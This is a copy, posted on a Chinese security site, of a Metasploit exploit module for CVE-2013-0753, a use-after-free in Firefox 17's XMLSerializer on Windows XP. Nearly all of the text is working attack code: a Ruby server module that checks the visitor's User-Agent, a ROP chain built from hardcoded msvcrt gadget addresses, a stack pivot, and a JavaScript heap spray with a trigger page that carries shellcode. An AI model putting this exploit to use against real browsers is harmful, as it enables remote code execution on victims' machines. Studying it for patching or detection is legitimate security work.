首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Firefox XMLSerializer Use After Free
来源:metasploit.com 作者:regenrecht 发布时间:2013-08-29  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::RopDb

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Firefox XMLSerializer Use After Free',
			'Description'    => %q{
				This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically
				an use after free of an Element object, when using the serializeToStream method
				with a specially crafted OutputStream defining its own write function. This module
				has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP
				SP3.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'regenrecht',  # Vulnerability Discovery, Analysis and PoC
					'juan vazquez' # Metasploit module
				],
			'References'     =>
				[
					[ 'CVE', '2013-0753' ],
					[ 'OSVDB', '89021'],
					[ 'BID', '57209'],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-006/' ],
					[ 'URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-16.html' ],
					[ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=814001' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'PrependMigrate' => true
				},
			'Payload'        =>
				{
					'BadChars'    => "\x00",
					'DisableNops' => true,
					'Space'       => 30000 # Indeed a sprayed chunk, just a high value where any payload fits
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Firefox 17  / Windows XP SP3',
						{
							'FakeObject'   => 0x0c101008, # Pointer to the Sprayed Memory
							'FakeVFTable'  => 0x0c10100c, # Pointer to the Sprayed Memory
							'RetGadget'    => 0x77c3ee16, # ret from msvcrt
							'PopRetGadget' => 0x77c50d13, # pop # ret from msvcrt
							'StackPivot'   => 0x77c15ed5, # xcht eax,esp # ret msvcrt
						}
					]
				],
			'DisclosureDate' => 'Jan 08 2013',
			'DefaultTarget'  => 0))

	end

	def stack_pivot
		pivot = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18 # get teb
		pivot << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
		pivot << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
		pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
		return pivot
	end

	def junk(n=4)
		return rand_text_alpha(n).unpack("V").first
	end

	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		vprint_status("Agent: #{agent}")

		if agent !~ /Windows NT 5\.1/
			print_error("Windows XP not found, sending 404: #{agent}")
			send_not_found(cli)
			return
		end

		unless agent =~ /Firefox\/17/
			print_error("Browser not supported, sending 404: #{agent}")
			send_not_found(cli)
			return
		end

		# Fake object landed on 0x0c101008 if heap spray is working as expected
		code = [
			target['FakeVFTable'],
			target['RetGadget'],
			target['RetGadget'],
			target['RetGadget'],
			target['RetGadget'],
			target['PopRetGadget'],
			0x88888888, # In order to reach the call to the virtual function, according to the regenrecht's analysis
		].pack("V*")
		code << [target['RetGadget']].pack("V") * 183 # Because you get control with "call dword ptr [eax+2F8h]", where eax => 0x0c10100c (fake vftable pointer)
		code << [target['PopRetGadget']].pack("V") # pop # ret
		code << [target['StackPivot']].pack("V") # stackpivot # xchg eax # esp # ret
		code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})

		js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
		js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch))
		js_ptr = Rex::Text.to_unescape([target['FakeObject']].pack("V"), Rex::Arch.endian(target.arch))

		content = <<-HTML
<html>
<script>
var heap_chunks;

function heapSpray(shellcode, fillsled) {
	var chunk_size, headersize, fillsled_len, code;
	var i, codewithnum;
	chunk_size = 0x40000;
	headersize = 0x10;
	fillsled_len = chunk_size - (headersize + shellcode.length);
	while (fillsled.length <fillsled_len)
		fillsled += fillsled;
	fillsled = fillsled.substring(0, fillsled_len);
	code = shellcode + fillsled;
	heap_chunks = new Array();
	for (i = 0; i<1000; i++)
	{
		codewithnum = "HERE" + code;
		heap_chunks[i] = codewithnum.substring(0, codewithnum.length);
	}
}

function gen(len, pad) {
	pad = unescape(pad);

	while (pad.length < len/2)
		pad += pad;

	return pad.substring(0, len/2-1);
}

function run() {
	var container = [];

	var myshellcode = unescape("#{js_code}");
	var myfillsled = unescape("#{js_random}");
	heapSpray(myshellcode,myfillsled);

	var fake =
	"%u0000%u0000" +
	"%u0000%u0000" +
	"%u0000%u0000" +
	"%u0000%u0000" +
	"%u0000%u0000" +
	"%u0000%u0000" +
	"%u0000%u0000" +
	"#{js_ptr}";

	var small = gen(72, fake);

	var text = 'x';
	while (text.length <= 1024)
		text += text;

	var parent = document.createElement("parent");
	var child = document.createElement("child");

	parent.appendChild(child);
	child.setAttribute("foo", text);

	var s = new XMLSerializer();
	var stream = {
		write: function() {
			parent.removeChild(child);
			child = null;
			for (i = 0; i < 2097152; ++i)
				container.push(small.toLowerCase());
		}
	};

	s.serializeToStream(parent, stream, "UTF-8");
}
</script>
<body onload="run();">
</body>
</html>
		HTML

		print_status("URI #{request.uri} requested...")
		print_status("Sending HTML")
		send_response(cli, content, {'Content-Type'=>'text/html'})

	end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SPIP Connect Parameter PHP Inj
·HP LoadRunner lrFileIOService
·VMWare Setuid vmware-mount Uns
·Microsoft Hotmail or Outlook 0
·xml2 Fuzzer 1.0 exploit
·SPIP connect Parameter PHP Inj
·WinAmp 5.63 (winamp.ini) - Loc
·OSX <= 10.8.4 - Local Root Pri
·Mac OS X Sudo Password Bypass
·IKE and AuthIP IPsec Keyring M
·Belkin G Wireless Router Firmw
·KingView 6.53 - ActiveX Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved